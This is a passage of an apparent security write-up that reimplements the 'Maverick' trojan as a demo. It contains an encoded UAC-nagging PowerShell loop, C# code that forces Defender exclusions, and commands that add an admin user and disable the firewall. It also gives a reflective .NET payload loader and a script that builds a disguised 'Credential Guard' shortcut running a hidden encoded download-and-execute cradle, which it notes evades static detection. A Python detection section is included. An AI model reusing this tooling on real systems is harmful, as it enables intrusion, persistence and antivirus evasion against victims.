try { throw "" } catch { while ( -not $? ) { try { Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs } catch { Write-Error "" -ErrorAction SilentlyContinue } } }
```
- CyberChef
> encode as UTF-16LE, then base64, and run PowerShell with the encoded command:
```bash
powershell -e dAByAHkAIAB7ACAAdABoAHIAbwB3ACAAIgAiACAAfQAgAGMAYQB0AGMAaAAgAHsAIAB3AGgAaQBsAGUAIAAoACAALQBuAG8AdAAgACQAPwAgACkAIAB7ACAAdAByAHkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHcAbAByAG0AZAByAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgAtAHMAIAAzADYAMAAwACAALQBmACAAMAAgAC0AdAAgAF8AIAAtAG0AIABfACAALQBhACAAMQAxACAALQB1ACAAYwBtAGQALgBlAHgAZQAiACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQAgAH0A
```
### C#
The loop below is the eSentire sample linked above: it keeps re-launching an elevated PowerShell (so UAC keeps prompting) until the Defender exclusions are added and the child exits with code 0.
```csharp
using System.Diagnostics;

// exclusionFolderPath / exclusionFileFolderPath / exclusionFilePath are the payload's own locations
static void PromptUntilElevated(string exclusionFolderPath, string exclusionFileFolderPath, string exclusionFilePath)
{
    while (true)
    {
        try
        {
            Process powershellProcess = new Process();
            powershellProcess.StartInfo.FileName = "powershell.exe";
            powershellProcess.StartInfo.UseShellExecute = true;   // required for the "runas" verb
            powershellProcess.StartInfo.Verb = "runas";           // triggers the UAC prompt
            powershellProcess.StartInfo.CreateNoWindow = true;
            powershellProcess.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            powershellProcess.StartInfo.Arguments =
                "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command \"" +
                " try { if (Get-Command Add-MpPreference -ErrorAction SilentlyContinue) { " +
                "Add-MpPreference -ExclusionPath '" + exclusionFolderPath + "' -Force; " +
                "Add-MpPreference -ExclusionPath '" + exclusionFileFolderPath + "' -Force; " +
                "Add-MpPreference -ExclusionProcess '" + exclusionFilePath + "' -Force; } } catch { } \"";
            powershellProcess.Start();          // throws if the user refuses the prompt -> catch -> retry
            powershellProcess.WaitForExit();
            int exitCode = powershellProcess.ExitCode;
            if (exitCode == 0)
            {
                break;                          // elevated run succeeded, stop prompting
            }
        }
        catch
        {
            continue;
        }
    }
}
```

## exploit
:::info
What can an attacker do with an administrative CMD?
:::
- Create a new administrative user account
> maintain access even if the initial exploit is patched
``net user username password /add``
``net localgroup administrators username /add``
- Modify system settings / registry
> make malicious programs run automatically at startup
- Disable / modify security controls (AV or firewall)
``netsh advfirewall set allprofiles state off``
- Encrypt / delete critical files
> ransomware-like behaviour or sabotage
- Edit critical files
> e.g. C:\Windows\System32\drivers\etc\hosts
- etc.
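The scope section promises starter detection artifacts; as an added example (not from the report or the referenced vendors), here is detection logic for the Stage 1 process chain and the Startup persistence in Python, run over constructed process-creation events of the kind Sysmon Event ID 1 or Security 4688 provide. The chain-length threshold, the `HealthApp-` hex pattern and the sample events are mine; the two marker strings `for %%` and ` in (` are the ones the Trojan itself uses to recognise its batch file.

```python
"""Starter detection logic (added example) for the Maverick Stage 1 chain and its Startup
persistence: a cmd.exe `for %v in (...) do` variable chain spawning hidden, base64-encoded
PowerShell, and the obfuscated HealthApp-*.bat dropped in the Startup folder."""
import os
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation event (the fields Sysmon EID 1 / Security 4688 carry)."""
    image: str
    cmdline: str
    parent_image: str
    parent_cmdline: str


FOR_CHAIN_RE = re.compile(r"for\s+%~?\w\s+in\s+\(", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hid(?:den)?", re.I)
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:ncodedcommand|nc|n)?\s+[A-Za-z0-9+/]{40,}={0,2}", re.I)
MIN_CHAIN = 3  # threshold is mine: legitimate batch one-liners rarely stack 3+ for-variables


def _basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the names of the rules the event matches (empty list = nothing suspicious)."""
    hits = []
    name, parent = _basename(ev.image), _basename(ev.parent_image)
    chain_len = len(FOR_CHAIN_RE.findall(ev.cmdline))
    parent_chain_len = len(FOR_CHAIN_RE.findall(ev.parent_cmdline))
    # Rule 1: cmd.exe /C running a stack of for-variable assignments (the .lnk obfuscation).
    if name == "cmd.exe" and re.search(r"/c\b", ev.cmdline, re.I) and chain_len >= MIN_CHAIN:
        hits.append("cmd_for_variable_chain")
    # Rule 2: hidden-window PowerShell carrying an encoded command (the download cradle).
    if name in ("powershell.exe", "pwsh.exe") and HIDDEN_RE.search(ev.cmdline) and ENCODED_RE.search(ev.cmdline):
        hits.append("hidden_encoded_powershell")
        # Rule 3: ... spawned by such a cmd.exe chain: the full Stage 1 signature.
        if parent == "cmd.exe" and parent_chain_len >= MIN_CHAIN:
            hits.append("maverick_stage1_chain")
    return hits


# Persistence: the Trojan recognises its own .bat via the markers "for %%" and " in (" and
# otherwise drops HealthApp-<6 chars>.bat (the chars are assumed to be hex from a GUID).
STARTUP_NAME_RE = re.compile(r"^HealthApp-[0-9a-f]{6}\.bat$", re.I)


def startup_bat_indicators(filename: str, content: str) -> list:
    hits = []
    if STARTUP_NAME_RE.match(filename):
        hits.append("healthapp_name")
    if "for %%" in content and " in (" in content:
        hits.append("for_variable_marker")
    return hits


def scan_startup_folder(folder: str) -> dict:
    """Run the .bat check over a real Startup folder on a suspect host."""
    findings = {}
    for entry in os.scandir(folder):
        if entry.is_file() and entry.name.lower().endswith(".bat"):
            with open(entry.path, encoding="utf-8", errors="replace") as f:
                hits = startup_bat_indicators(entry.name, f.read())
            if hits:
                findings[entry.name] = hits
    return findings


# Constructed sample events (not real telemetry); the encoded argument is the page's first
# base64 fragment, long enough to pass the length threshold.
CMD_IMG = "C:\\Windows\\System32\\cmd.exe"
PS_IMG = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
LNK_CMDLINE = ('"C:\\Windows\\System32\\cmd.exe" /WMRX:F0E /WFXI:BNYE5S /D/C "for %o in (-) do '
               'for %a in (p) do for %O in (ell.) do for %J in (exe) do %a%O%J %o"')
SAMPLE_EVENTS = [
    ProcEvent(CMD_IMG, LNK_CMDLINE, "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcEvent(PS_IMG, "powershell.exe -w hid -enc "
              "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC",
              CMD_IMG, LNK_CMDLINE),
    ProcEvent(PS_IMG, "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
              "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcEvent(CMD_IMG, 'cmd.exe /C "for %i in (*.log) do type %i"', "C:\\Windows\\explorer.exe", "explorer.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev.image), classify(ev))
    print(startup_bat_indicators("HealthApp-3fa9c1.bat", "for %%a in (p) do for %%b in (ow) do echo %%a%%b"))
```

The same three rules translate directly into a Sigma `process_creation` rule (cmd.exe with repeated `for %` and a child `powershell.exe` whose command line contains `-w hid` and `-enc`), and `scan_startup_folder()` can be pointed at `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` on a suspect host.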
# DEMO
- https://github.com/trhoanglan204/DemoMaverick

## C2 Server
- For simplicity, the WebAPI and the WebApp are combined
- The UI can interact with multiple clients

![image](https://hackmd.io/_uploads/ByyWJ6HgZx.png)

## Client .NET
- Performs the actions requested by the server

### Maverick.Agent
- Console App, .NET Framework 4.8 (.exe), for testing and development

### Maverick.Load
- Class Library, .NET Framework 4.8 (.dll), for reflective loading

### Maverick.Template
- WinApp, .NET Core 9.0 (.exe), native AOT build
- Resources and icon can be faked to impersonate a legitimate application

## ps1 loader
- For the demo, the dll is simply base64-encoded
```ps1
# Demo only: the payload and its Newtonsoft.Json dependency are embedded as base64 placeholders
$__PayloadTemplate__ = @"
__PAYLOAD_B64__
"@
$__NewtonSoft__ = @"
__DLL_NEWTONSOFT_B64__
"@
# Load the dependency first so the payload's references resolve, then the payload itself
[System.Reflection.Assembly]::Load([Convert]::FromBase64String($__NewtonSoft__))
$__Assembly__ = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($__PayloadTemplate__))
$__Entry__ = $__Assembly__.EntryPoint
if ($__Entry__ -ne $null) {
    # exe payload: call Main() with or without its string[] args parameter
    $__paramCount__ = $__Entry__.GetParameters().Count
    if ($__paramCount__ -eq 0) {
        $__Entry__.Invoke($null, @())
    } else {
        $__argsArray__ = [string[]]@()
        # the unary comma keeps the empty string[] as a single argument instead of flattening it away
        $__Entry__.Invoke($null, @(, $__argsArray__))
    }
} else {
    # dll payload: no EntryPoint, so the type and method names must be hard-coded
    $__type__ = $__Assembly__.GetType("Maverick.Agent.Program")
    if ($__type__ -eq $null) { throw "Type Program not found" }
    $__meth__ = $__type__.GetMethod("Main")
    if ($__meth__ -eq $null) { throw "Method Main not found" }
    $__meth__.Invoke($null, @())
}
```
> With a dll payload we have to hard-code the ``Assembly.GetType`` + ``.GetMethod`` names
> which is why even variable and function names have to be obfuscated
> With a .NET exe we can just find the EntryPoint and ``.Invoke`` it directly (note that this does not work with a native AOT build)

## shortcut .lnk
- Note that if we use the same template as Maverick, Windows Defender statically detects the shortcut as soon as it is created
- So instead, for demo purposes, I will call powershell directly
```ps1
# Builds a shortcut that runs a hidden PowerShell with an encoded download cradle
# (the encoded command decodes to an IEX DownloadString against http://127.0.0.1:8000/api/init/...)
$shortcutPath = "$env:USERPROFILE\Desktop\Credential Guard.lnk"
$targetPath = "$env:WINDIR\System32\WindowsPowerShell\v1.0\powershell.exe"
$arguments = '-w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA4ADAAMAAwAC8AYQBwAGkALwBpAG4AaQB0AC8ANABkADYAMQA3ADQANABlADYAMQA2ADkANAAzADYAOAA2ADEANAAzADYAOAA2ADEANAAzADYAOAA2ADEAJwApAA=='
$workingDir = "$env:WINDIR\System32"
$WshShell = New-Object -ComObject WScript.Shell
$shortcut = $WshShell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $targetPath
$shortcut.Arguments = $arguments
$shortcut.WorkingDirectory = $workingDir
$shortcut.IconLocation = "$targetPath,0"   # borrow PowerShell's own icon
$shortcut.Save()
```
--> bypasses static detection

## Android payload
- To extend platform coverage, why not build a payload for Android as well?
https://drive.google.com/file/d/1HrfI7FGMLMYW6cZSkE4GbQm5r08L6KFh/view?usp=sharing